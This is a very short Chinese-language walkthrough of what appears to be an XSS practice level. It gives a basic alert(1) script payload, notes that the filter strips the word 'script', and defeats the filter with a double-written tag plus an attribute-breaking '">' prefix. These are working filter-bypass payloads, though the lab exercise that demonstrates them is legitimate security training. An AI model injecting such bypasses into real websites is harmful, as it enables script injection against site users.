1、话不多说:<script>alert(1)</script> 查看源代码可以发现script会被吃掉 2、喜欢吃,就夹带私货(双写) : <scriscriptpt>alert(1)</scrscriptipt> 3、通关: "><scriscriptpt>alert(1)</scrscriptipt> 查看通关源代码,从这里可以看到,已经成功写入。